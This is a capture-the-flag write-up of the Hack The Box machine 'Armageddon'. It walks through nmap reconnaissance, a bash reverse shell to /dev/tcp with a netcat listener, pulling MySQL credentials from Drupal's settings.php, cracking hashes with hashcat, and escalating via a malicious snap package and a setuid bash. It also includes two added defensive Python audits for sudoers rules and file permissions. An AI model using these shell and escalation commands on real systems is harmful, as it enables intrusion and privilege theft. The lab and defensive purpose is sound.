Hack The Box — Armageddon Write-up

Armageddon — Easy — Linux

Let's start pwning it ❗️

Reconnaissance

As we step into the box, the first thing we do is scan its ports with nmap.

nmap -sC -sV -oN nmap.txt 10.10.10.233
  • -sC: run nmap's default script set against the open ports
  • -sV: detect the version of the service running on each port
  • -oN: write the normal (human-readable) output to the named file

Enumeration

bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
  • -i: start bash as an interactive shell
  • Terminal 2: listens for the incoming shell on port 443: nc -lvnp 443
  • Terminal 3: serves index.html over HTTP on port 80 so it can be fetched by the target: python -m SimpleHTTPServer 80

Privilege Escalation

We already know that Drupal is set up with a MySQL database by default, so the next step is to find the configuration file that stores the MySQL username and password. A quick search shows that Drupal keeps it in /sites/default/settings.php, so let's check settings.php.

mysql -u drupaluser --password=CQHEy@9M*m23gBVj -e 'show databases'
  • --password: the MySQL password taken from settings.php
  • -e: execute the given SQL statement and exit
mysql -u drupaluser --password=CQHEy@9M*m23gBVj -D drupal -e 'show tables'
  • -D: select the drupal database before running the statement

Knowing the type and cracking hash

hashcat --example-hash | less
  • prints hashcat's example hash for every mode, so the format of the dumped hash can be matched to its mode number
hashcat -m 7900 hashes /usr/share/wordlists/rockyou.txt
  • -m 7900: the Drupal 7 hash mode; the wordlist is passed as a positional argument (hashcat's -w flag sets the workload profile, not the wordlist)

Further Privilege Escalation

Our next step is to log in to the machine as this user over SSH, which is running on port 22.

sudo -l
  • -l: lists the commands the current user is allowed to run through sudo, and as which user
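sudo -l shows the rules from the user's side; the administrator's side of the same check is to audit the sudoers file for rules that hand out more than intended. The following is an added example (not part of the write-up) that parses /etc/sudoers-style rules and flags three things: rules for any command, NOPASSWD rules, and rules that let a user run a package installer (the lesson this box teaches about snap) or pass wildcard arguments. The sample rules, the user names in them and the INSTALLER_COMMANDS set are constructed assumptions, not the box's real configuration.

```python
"""Sudoers audit: flag rules that let a user reach root outside the intended
scope.  Added example, not from the write-up; sample rules are constructed."""
import re
from dataclasses import dataclass, field

# Commands that install arbitrary software as root.  'snap' is the one this
# box relied on; the set is an assumption to extend per environment.
INSTALLER_COMMANDS = {"/usr/bin/snap", "/snap/bin/snap"}

# user_or_%group  host=(runas) [TAG: ...] command[, command ...]
SUDO_RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class Finding:
    who: str
    rule: str
    reasons: list = field(default_factory=list)


def audit_sudoers(lines):
    """Return a Finding for every non-root rule that carries a risk marker."""
    findings = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if m is None or m.group("who") == "root":    # root's own ALL rule is expected
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        reasons = []
        if "NOPASSWD" in tags:
            reasons.append("nopasswd")               # no re-authentication before escalation
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if cmd == "ALL":
                reasons.append("any-command")
                continue
            binary = cmd.split()[0]
            if binary in INSTALLER_COMMANDS:
                reasons.append(f"installer:{binary}")
            if "*" in cmd:
                reasons.append("wildcard-args")      # '*' matches any argument string
        if reasons:
            findings.append(Finding(m.group("who"), line, reasons))
    return findings


# Constructed sample in /etc/sudoers syntax (not the box's real file).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
webadmin        ALL=(root) NOPASSWD: /usr/bin/snap install *
deploy          ALL=(www-data) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS.splitlines()):
        print(f"{f.who:12} {', '.join(f.reasons):45} {f.rule}")
```

Running it against the sample reports the %sudo group rule (any command) and the webadmin rule (no password, an installer, and a wildcard), while the deploy rule that restricts the command and its arguments passes. Lines from `sudo -l` output can be fed in the same way once the user name and host are prepended to match the sudoers syntax.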

Creating a simple .snap package

Creating a malicious .snap package

We will use chown and chmod to make the copy of bash in brucetherealadmin's home directory owned by root with the setuid bit set, so that the 'brucetherealadmin' user can run it as root.

chown root:root /home/brucetherealadmin/bash;chmod 7455 /home/brucetherealadmin/bash
bash -p
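The two conditions this write-up leans on, a root-owned setuid copy of a shell sitting in a home directory (this section) and a world-readable settings.php holding database credentials (the earlier Privilege Escalation section), are both visible to a defender in plain file metadata. The following is an added example, not from the write-up, of a small Python audit that walks a tree and reports either condition. The sample entries are constructed (the bash entry reuses the path and mode 7455 from the commands above), and the TRUSTED_SETUID_DIRS and SECRET_FILE_NAMES lists are assumptions to adjust for the distribution and application.

```python
"""File-permission audit for two findings from this box: setuid/setgid files
outside the system binary directories, and readable credential files.
Added example, not part of the write-up; sample entries are constructed."""
import os
import stat
from dataclasses import dataclass

# Where setuid binaries legitimately live (assumption: adjust per distribution).
TRUSTED_SETUID_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec")
# Files known to hold credentials; settings.php is Drupal's database config.
SECRET_FILE_NAMES = {"settings.php"}


@dataclass(frozen=True)
class Entry:
    path: str
    mode: int   # full st_mode, type bits included
    uid: int


@dataclass(frozen=True)
class Finding:
    path: str
    reason: str


def iter_files(root):
    """Yield an Entry for every regular file under root; symlinks are not followed."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield Entry(path, st.st_mode, st.st_uid)


def in_trusted_dir(path):
    return any(path.startswith(d + "/") for d in TRUSTED_SETUID_DIRS)


def audit_entries(entries):
    """Pure check over (path, mode, uid) records so it can run on constructed data."""
    findings = []
    for e in entries:
        perm = stat.S_IMODE(e.mode)                  # the 0o7777 bits, setuid/setgid included
        if perm & (stat.S_ISUID | stat.S_ISGID) and not in_trusted_dir(e.path):
            who = "root" if e.uid == 0 else f"uid {e.uid}"
            findings.append(Finding(e.path, f"setuid/setgid file owned by {who} outside trusted directories"))
        if os.path.basename(e.path) in SECRET_FILE_NAMES:
            if perm & stat.S_IROTH:
                findings.append(Finding(e.path, "credential file is world-readable"))
            if perm & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(Finding(e.path, "credential file is writable by group or others"))
    return findings


# Constructed sample (uid 33 stands in for the web server account).
SAMPLE_ENTRIES = [
    Entry("/usr/bin/passwd", 0o104755, 0),                           # expected setuid binary
    Entry("/home/brucetherealadmin/bash", 0o107455, 0),              # the copy made above, mode 7455
    Entry("/var/www/html/sites/default/settings.php", 0o100644, 33), # readable by every local user
    Entry("/var/www/html/index.php", 0o100644, 33),                  # public file, nothing to flag
]

if __name__ == "__main__":
    import sys
    entries = iter_files(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ENTRIES
    for f in audit_entries(entries):
        print(f"{f.path}: {f.reason}")
```

Run with a directory argument it audits the live filesystem (for example /home and the web root); without one it prints the two findings from the sample. Tightening settings.php to 0640 owned by the web server group removes the credential finding, and a root-owned setuid file under /home is never expected and warrants removal and investigation of how it got there.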

Lesson Learned

  1. Never leave web applications outdated; keep an eye on them and update them regularly, as an outdated application can hand the attacker a shell.
  2. Do not leave the default configuration file /sites/default/settings.php readable, as it can be easily accessed by an attacker once they get a lead.
  3. Users should not be granted the privilege to install snap packages, as a malicious package, once installed, can escalate the attacker's privileges.
